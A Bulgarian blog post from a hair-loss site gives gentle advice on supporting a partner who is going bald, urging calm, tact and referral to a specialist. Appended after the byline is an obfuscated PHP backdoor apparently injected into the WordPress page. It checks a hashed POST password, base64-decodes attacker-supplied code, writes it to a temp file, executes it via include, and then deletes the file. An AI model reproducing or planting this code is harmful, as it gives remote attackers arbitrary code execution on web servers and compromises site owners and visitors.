Как да помогнем на половинката си, ако оплешивява | Косопад

Как да помогнем на половинката си, ако оплешивява

„Скъпи, оплешивяваш“. Това със сигурност ще притесни всеки, които страда от обилен косопад. Дори да е изречена с неутрален или притеснителен тон, засяга самочувствието и става причина за тежки размисли.

opleshivqvane-pomosht

Да се коментира подобен проблем с половинката е доста сложно. Хората с косопад първи си дават сметка за ситуацията. Много често, думите на останалите ги карат да осъзнават, че и те забелязват. А това още повече увеличава проблема, някои го възприемат и като атака.

Как да реагираме, ако половинката ни е в подобна ситуация? Няма златно правило, защото всеки реагира по индивидуален начин.

Най- важното е да не драматизираме проблема. Оплешивяването е и удар срещу самочувствието. Ако започнем да истеризираме, само ще задълбочим кризата в самооценката на отсрещния. Трябва да пазим самочувствието му, защото липсата му причинява стрес, а той само увеличава косопада.

opleshivqvane

Трябва да създадем спокойна атмосфера, да изслушаме човек с проблема, да го изчакаме сам да го поиска. Обикновено хората с такъв проблем не се отпускат веднага да го коментират, но ако им вдъхнем увереност, по- лесно ще започнат да го правят. Само не трябва да ги пресираме.

Трябва да осъзнаем, че оплешивяването потиска половинката ни и му причинява голямо неудобство, затова трябва да сме тактични. Трябва така да предразположим половинката си, че сам да ни поиска съвет и да го насочим към специалист и пр.

Колкото по- рано се започне третирането на косопада, толкова по- големи шансове за успех имаме.

09. декември 2014 19:56:08 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}